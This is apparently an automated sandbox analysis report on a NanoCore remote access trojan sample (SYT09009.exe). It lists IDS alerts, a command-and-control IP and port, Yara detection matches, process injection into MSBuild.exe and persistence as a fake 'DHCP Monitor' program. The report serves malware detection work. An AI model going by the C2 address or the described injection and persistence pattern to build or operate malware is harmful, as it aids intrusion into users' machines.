Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49723 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49724 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49727 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49728 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49732 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49733 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49740 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49741 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49742 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49743 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49752 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49755 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49756 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49759 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49760 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49761 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49762 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49763 -> 185.222.57.171:4445

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: 185.222.57.171

Source: global traffic

TCP traffic: 192.168.2.5:49718 -> 185.222.57.171:4445

Source: Joe Sandbox View

IP Address: 185.222.57.171 185.222.57.171

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.171

Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: SYT09009.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SYT09009.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49677
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49676
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: C:\Users\user\Desktop\SYT09009.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 3332, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.3.MSBuild.exe.404c416.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.3.MSBuild.exe.406646f.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.3.MSBuild.exe.4060a41.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.3.MSBuild.exe.4060a41.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.3.MSBuild.exe.406646f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.3.MSBuild.exe.406646f.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.3.MSBuild.exe.404c416.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.3.MSBuild.exe.404c416.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\SYT09009.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 6_2_02E40708	6_2_02E40708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_0074692F	10_2_0074692F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00746950	10_2_00746950
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00746D08	10_2_00746D08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_02AC0708	10_2_02AC0708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_00846D08	12_2_00846D08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_00846950	12_2_00846950
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_0084692F	12_2_0084692F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02B10708	12_2_02B10708

Source: SYT09009.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SYT09009.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SYT09009.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SYT09009.exe, 00000000.00000003.243093126.0000000002AC6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SYT09009.exe
Source: SYT09009.exe, 00000000.00000002.251037646.0000000002430000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SYT09009.exe

Source: SYT09009.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 3332, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.3.MSBuild.exe.404c416.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.3.MSBuild.exe.404c416.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.MSBuild.exe.406646f.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.3.MSBuild.exe.406646f.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.MSBuild.exe.4060a41.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.3.MSBuild.exe.4060a41.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.MSBuild.exe.4060a41.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.3.MSBuild.exe.406646f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.3.MSBuild.exe.406646f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.MSBuild.exe.406646f.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.3.MSBuild.exe.404c416.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.3.MSBuild.exe.404c416.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.MSBuild.exe.404c416.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: dhcpmon.exe, 0000000C.00000002.274363697.0000000002EB1000.00000004.00000001.sdmp	Binary or memory string: r)C:\Program Files (x86)\DHCP Monitor\.sln
Source: MSBuild.exe, 00000001.00000003.250739424.0000000000CAA000.00000004.00000001.sdmp, dhcpmon.exe, 0000000A.00000000.259152033.0000000000742000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.273453146.0000000000842000.00000002.00020000.sdmp, dhcpmon.exe.1.dr	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: MSBuild.exe, 00000001.00000003.250739424.0000000000CAA000.00000004.00000001.sdmp, dhcpmon.exe, 0000000A.00000000.259152033.0000000000742000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.273453146.0000000000842000.00000002.00020000.sdmp, dhcpmon.exe.1.dr	Binary or memory string: MSBuild MyApp.csproj /t:Clean /p:Configuration=Debug
Source: MSBuild.exe, 00000001.00000003.250739424.0000000000CAA000.00000004.00000001.sdmp, dhcpmon.exe, 0000000A.00000000.259152033.0000000000742000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.273453146.0000000000842000.00000002.00020000.sdmp, dhcpmon.exe.1.dr	Binary or memory string: *.sln+AmbiguousProjectError'MissingProjectError)ProjectNotFoundError)InvalidPropertyError
Source: dhcpmon.exe	Binary or memory string: *.sln

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/16@0/1

Source: C:\Users\user\Desktop\SYT09009.exe

0_2_00403348

Source: C:\Users\user\Desktop\SYT09009.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\SYT09009.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{2dd052c5-2546-4017-851f-7f690b3c80bf}

Source: C:\Users\user\Desktop\SYT09009.exe

File created: C:\Users\user\AppData\Local\Temp\nsa939E.tmp

Jump to behavior

Source: SYT09009.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SYT09009.exe

ReversingLabs: Detection: 38%

Source: C:\Users\user\Desktop\SYT09009.exe

File read: C:\Users\user\Desktop\SYT09009.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SYT09009.exe 'C:\Users\user\Desktop\SYT09009.exe'
Source: C:\Users\user\Desktop\SYT09009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\SYT09009.exe'
